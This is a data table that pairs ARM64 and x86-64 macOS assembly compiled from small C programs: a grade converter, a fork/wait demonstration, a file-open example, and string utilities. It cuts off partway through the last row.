arm
stringlengths 122
20M
| x86
stringlengths 122
20M
| filename
stringlengths 18
26
|
---|---|---|
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _puts
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-8]
subs w8, w8, #100
cset w8, le
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _puts
stur wzr, [x29, #-4]
b LBB0_11
LBB0_3:
ldur w8, [x29, #-8]
mov w9, #10
sdiv w8, w8, w9
stur w8, [x29, #-8]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldur w8, [x29, #-8]
subs w8, w8, #6
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #4
cset w8, hi
tbnz w8, #0, LBB0_9
; %bb.4:
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI0_0@PAGE
add x10, x10, lJTI0_0@PAGEOFF
Ltmp0:
adr x8, Ltmp0
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB0_5:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _puts
b LBB0_10
LBB0_6:
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _puts
b LBB0_10
LBB0_7:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _puts
b LBB0_10
LBB0_8:
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _puts
b LBB0_10
LBB0_9:
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _puts
b LBB0_10
LBB0_10:
stur wzr, [x29, #-4]
b LBB0_11
LBB0_11:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
.p2align 2
lJTI0_0:
.long LBB0_8-Ltmp0
.long LBB0_7-Ltmp0
.long LBB0_6-Ltmp0
.long LBB0_5-Ltmp0
.long LBB0_5-Ltmp0
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter numerical grade: "
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "Error"
l_.str.3: ; @.str.3
.asciz "Letter grade: "
l_.str.4: ; @.str.4
.asciz "A"
l_.str.5: ; @.str.5
.asciz "B"
l_.str.6: ; @.str.6
.asciz "C"
l_.str.7: ; @.str.7
.asciz "D"
l_.str.8: ; @.str.8
.asciz "F"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
callq _puts
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $0, -8(%rbp)
jl LBB0_2
## %bb.1:
cmpl $100, -8(%rbp)
jle LBB0_3
LBB0_2:
leaq L_.str.2(%rip), %rdi
callq _puts
movl $0, -4(%rbp)
jmp LBB0_10
LBB0_3:
movslq -8(%rbp), %rax
imulq $1717986919, %rax, %rax ## imm = 0x66666667
movq %rax, %rcx
shrq $63, %rcx
## kill: def $ecx killed $ecx killed $rcx
sarq $34, %rax
## kill: def $eax killed $eax killed $rax
addl %ecx, %eax
movl %eax, -8(%rbp)
leaq L_.str.3(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl -8(%rbp), %eax
addl $-6, %eax
movl %eax, %ecx
movq %rcx, -16(%rbp) ## 8-byte Spill
subl $4, %eax
ja LBB0_8
## %bb.11:
movq -16(%rbp), %rax ## 8-byte Reload
leaq LJTI0_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB0_4:
leaq L_.str.4(%rip), %rdi
callq _puts
jmp LBB0_9
LBB0_5:
leaq L_.str.5(%rip), %rdi
callq _puts
jmp LBB0_9
LBB0_6:
leaq L_.str.6(%rip), %rdi
callq _puts
jmp LBB0_9
LBB0_7:
leaq L_.str.7(%rip), %rdi
callq _puts
jmp LBB0_9
LBB0_8:
leaq L_.str.8(%rip), %rdi
callq _puts
LBB0_9:
movl $0, -4(%rbp)
LBB0_10:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L0_0_set_7, LBB0_7-LJTI0_0
.set L0_0_set_6, LBB0_6-LJTI0_0
.set L0_0_set_5, LBB0_5-LJTI0_0
.set L0_0_set_4, LBB0_4-LJTI0_0
LJTI0_0:
.long L0_0_set_7
.long L0_0_set_6
.long L0_0_set_5
.long L0_0_set_4
.long L0_0_set_4
.end_data_region
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter numerical grade: "
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "Error"
L_.str.3: ## @.str.3
.asciz "Letter grade: "
L_.str.4: ## @.str.4
.asciz "A"
L_.str.5: ## @.str.5
.asciz "B"
L_.str.6: ## @.str.6
.asciz "C"
L_.str.7: ## @.str.7
.asciz "D"
L_.str.8: ## @.str.8
.asciz "F"
.subsections_via_symbols
| the_stack_data/1245221.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
bl _fork
str w0, [sp, #16] ; 4-byte Folded Spill
stur w0, [x29, #-8]
adds w8, w0, #1
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr w8, [sp, #16] ; 4-byte Folded Reload
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_4
LBB0_2:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _perror
mov w0, #1
bl _exit
LBB0_3:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
bl _getpid
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
bl _getppid
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #12
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _scanf
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
mov x8, sp
adrp x9, l_.str.9@PAGE
add x9, x9, l_.str.9@PAGEOFF
str x9, [x8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl _execlp
ldur w0, [x29, #-12]
bl _exit
LBB0_4:
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
bl _getpid
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
sub x0, x29, #12
bl _wait
ldur w8, [x29, #-12]
asr w8, w8, #8
and w10, w8, #0xff
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
b LBB0_5
LBB0_5:
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "fork"
l_.str.1: ; @.str.1
.asciz " CHILD: This is the child process!\n"
l_.str.2: ; @.str.2
.asciz " CHILD: My PID is %d\n"
l_.str.3: ; @.str.3
.asciz " CHILD: My parent's PID is %d\n"
l_.str.4: ; @.str.4
.asciz " CHILD: Enter my exit status (make it small): "
l_.str.5: ; @.str.5
.asciz " %d"
l_.str.6: ; @.str.6
.asciz " CHILD: I'm outta here!\n"
l_.str.7: ; @.str.7
.asciz "/bin/ls"
l_.str.8: ; @.str.8
.asciz "ls"
l_.str.9: ; @.str.9
.asciz "/donpacs"
l_.str.10: ; @.str.10
.asciz "PARENT: This is the parent process!\n"
l_.str.11: ; @.str.11
.asciz "PARENT: My PID is %d\n"
l_.str.12: ; @.str.12
.asciz "PARENT: My child's PID is %d\n"
l_.str.13: ; @.str.13
.asciz "PARENT: I'm now waiting for my child to exit()...\n"
l_.str.14: ; @.str.14
.asciz "PARENT: My child's exit status is: %d\n"
l_.str.15: ; @.str.15
.asciz "PARENT: I'm outta here!\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
callq _fork
movl %eax, -8(%rbp)
movl %eax, %ecx
movl %ecx, -16(%rbp) ## 4-byte Spill
subl $-1, %eax
je LBB0_1
jmp LBB0_5
LBB0_5:
movl -16(%rbp), %eax ## 4-byte Reload
testl %eax, %eax
je LBB0_2
jmp LBB0_3
LBB0_1:
leaq L_.str(%rip), %rdi
callq _perror
movl $1, %edi
callq _exit
LBB0_2:
leaq L_.str.1(%rip), %rdi
xorl %eax, %eax
movl %eax, -24(%rbp) ## 4-byte Spill
movb %al, -17(%rbp) ## 1-byte Spill
callq _printf
callq _getpid
movl %eax, %esi
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.2(%rip), %rdi
callq _printf
callq _getppid
movl %eax, %esi
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.3(%rip), %rdi
callq _printf
## kill: def $ecx killed $eax
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.4(%rip), %rdi
callq _printf
## kill: def $ecx killed $eax
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.5(%rip), %rdi
leaq -12(%rbp), %rsi
callq _scanf
## kill: def $ecx killed $eax
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.6(%rip), %rdi
callq _printf
movl -24(%rbp), %ecx ## 4-byte Reload
## kill: def $edx killed $eax
movb -17(%rbp), %al ## 1-byte Reload
leaq L_.str.7(%rip), %rdi
leaq L_.str.8(%rip), %rsi
leaq L_.str.9(%rip), %rdx
## kill: def $rcx killed $ecx
callq _execlp
movl -12(%rbp), %edi
callq _exit
LBB0_3:
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
callq _getpid
movl %eax, %esi
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
movl -8(%rbp), %esi
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
leaq -12(%rbp), %rdi
callq _wait
movl -12(%rbp), %esi
sarl $8, %esi
andl $255, %esi
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.15(%rip), %rdi
movb $0, %al
callq _printf
## %bb.4:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "fork"
L_.str.1: ## @.str.1
.asciz " CHILD: This is the child process!\n"
L_.str.2: ## @.str.2
.asciz " CHILD: My PID is %d\n"
L_.str.3: ## @.str.3
.asciz " CHILD: My parent's PID is %d\n"
L_.str.4: ## @.str.4
.asciz " CHILD: Enter my exit status (make it small): "
L_.str.5: ## @.str.5
.asciz " %d"
L_.str.6: ## @.str.6
.asciz " CHILD: I'm outta here!\n"
L_.str.7: ## @.str.7
.asciz "/bin/ls"
L_.str.8: ## @.str.8
.asciz "ls"
L_.str.9: ## @.str.9
.asciz "/donpacs"
L_.str.10: ## @.str.10
.asciz "PARENT: This is the parent process!\n"
L_.str.11: ## @.str.11
.asciz "PARENT: My PID is %d\n"
L_.str.12: ## @.str.12
.asciz "PARENT: My child's PID is %d\n"
L_.str.13: ## @.str.13
.asciz "PARENT: I'm now waiting for my child to exit()...\n"
L_.str.14: ## @.str.14
.asciz "PARENT: My child's exit status is: %d\n"
L_.str.15: ## @.str.15
.asciz "PARENT: I'm outta here!\n"
.subsections_via_symbols
| the_stack_data/57949714.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ; -- Begin function bar
.p2align 2
_bar: ; @bar
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
ldr x0, [sp, #8]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl _bar
str x0, [sp, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
str x0, [sp, #8]
ldr x0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
bl _foo
str x0, [sp, #16]
ldr x0, [sp, #16]
bl _fclose
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "bar.txt"
l_.str.1: ; @.str.1
.asciz "w+"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ## -- Begin function bar
.p2align 4, 0x90
_bar: ## @bar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
callq _bar
movq %rax, -8(%rbp)
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq _foo
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
callq _fclose
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "bar.txt"
L_.str.1: ## @.str.1
.asciz "w+"
.subsections_via_symbols
| the_stack_data/173475.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _find_length ; -- Begin function find_length
.p2align 2
_find_length: ; @find_length
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str wzr, [sp, #4]
str wzr, [sp]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB0_1
LBB0_4:
ldr w0, [sp, #4]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _join_strings ; -- Begin function join_strings
.p2align 2
_join_strings: ; @join_strings
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
ldur x0, [x29, #-8]
bl _find_length
str w0, [sp, #8]
ldr x0, [sp, #16]
bl _find_length
str w0, [sp, #4]
ldr w8, [sp, #8]
str w8, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #8]
ldr w10, [sp, #4]
add w9, w9, w10
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #16]
ldr w9, [sp, #12]
ldr w10, [sp, #8]
subs w9, w9, w10
add x8, x8, w9, sxtw
ldrb w8, [x8]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #12]
add x9, x9, x10
strb w8, [x9]
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_1
LBB1_4:
ldur x8, [x29, #-8]
ldrsw x9, [sp, #12]
add x8, x8, x9
strb wzr, [x8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _compare_strings ; -- Begin function compare_strings
.p2align 2
_compare_strings: ; @compare_strings
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
str x1, [sp, #24]
str wzr, [sp, #8]
ldur x0, [x29, #-16]
bl _find_length
str w0, [sp, #20]
ldr x0, [sp, #24]
bl _find_length
str w0, [sp, #16]
ldr w8, [sp, #20]
ldr w9, [sp, #16]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
mov w8, #1
stur w8, [x29, #-4]
b LBB2_11
LBB2_2:
str wzr, [sp, #12]
b LBB2_3
LBB2_3: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_8
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_3 Depth=1
ldur x8, [x29, #-16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
ldr x9, [sp, #24]
ldrsw x10, [sp, #12]
ldrsb w9, [x9, x10]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_3 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_3 Depth=1
b LBB2_7
LBB2_7: ; in Loop: Header=BB2_3 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB2_3
LBB2_8:
ldr w8, [sp, #8]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_10
b LBB2_9
LBB2_9:
stur wzr, [x29, #-4]
b LBB2_11
LBB2_10:
mov w8, #1
stur w8, [x29, #-4]
b LBB2_11
LBB2_11:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _copy_string ; -- Begin function copy_string
.p2align 2
_copy_string: ; @copy_string
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
ldr x0, [sp, #16]
bl _find_length
str w0, [sp, #12]
str wzr, [sp, #8]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_4
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
add x8, x8, x9
ldrb w8, [x8]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #8]
add x9, x9, x10
strb w8, [x9]
b LBB3_3
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB3_1
LBB3_4:
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
add x8, x8, x9
strb wzr, [x8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _reverse ; -- Begin function reverse
.p2align 2
_reverse: ; @reverse
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2048
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #24]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
add x0, sp, #1040
bl _gets
b LBB4_1
LBB4_1: ; =>This Inner Loop Header: Depth=1
ldrsw x9, [sp, #24]
add x8, sp, #1040
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_3
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB4_1
LBB4_3:
ldr w8, [sp, #24]
subs w8, w8, #1
str w8, [sp, #28]
str wzr, [sp, #32]
b LBB4_4
LBB4_4: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #32]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_7
b LBB4_5
LBB4_5: ; in Loop: Header=BB4_4 Depth=1
ldrsw x9, [sp, #28]
add x8, sp, #1040
add x8, x8, x9
ldrb w8, [x8]
ldrsw x10, [sp, #32]
add x9, sp, #40
add x9, x9, x10
strb w8, [x9]
ldr w8, [sp, #28]
subs w8, w8, #1
str w8, [sp, #28]
b LBB4_6
LBB4_6: ; in Loop: Header=BB4_4 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB4_4
LBB4_7:
ldrsw x10, [sp, #32]
add x8, sp, #40
mov x9, x8
add x9, x9, x10
strb wzr, [x9]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldr w8, [sp, #36]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_9
b LBB4_8
LBB4_8:
bl ___stack_chk_fail
LBB4_9:
ldr w0, [sp, #20] ; 4-byte Folded Reload
add sp, sp, #2048
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #48
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _scanf
ldur w8, [x29, #-48]
subs w8, w8, #1
; kill: def $x8 killed $w8
stur x8, [x29, #-56] ; 8-byte Folded Spill
subs x8, x8, #5
cset w8, hi
tbnz w8, #0, LBB5_12
; %bb.2: ; in Loop: Header=BB5_1 Depth=1
ldur x11, [x29, #-56] ; 8-byte Folded Reload
adrp x10, lJTI5_0@PAGE
add x10, x10, lJTI5_0@PAGEOFF
Ltmp1:
adr x8, Ltmp1
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #24
str x8, [sp, #64] ; 8-byte Folded Spill
str x8, [x9]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _scanf
ldr x0, [sp, #64] ; 8-byte Folded Reload
bl _find_length
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
b LBB5_12
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #24
str x8, [sp, #56] ; 8-byte Folded Spill
str x8, [x9]
sub x8, x29, #44
str x8, [sp, #48] ; 8-byte Folded Spill
str x8, [x9, #8]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _scanf
ldr x1, [sp, #48] ; 8-byte Folded Reload
ldr x0, [sp, #56] ; 8-byte Folded Reload
bl _join_strings
ldr x8, [sp, #56] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
b LBB5_12
LBB5_5: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #24
str x8, [sp, #40] ; 8-byte Folded Spill
str x8, [x9]
sub x8, x29, #44
str x8, [sp, #32] ; 8-byte Folded Spill
str x8, [x9, #8]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _scanf
ldr x1, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _compare_strings
subs w8, w0, #0
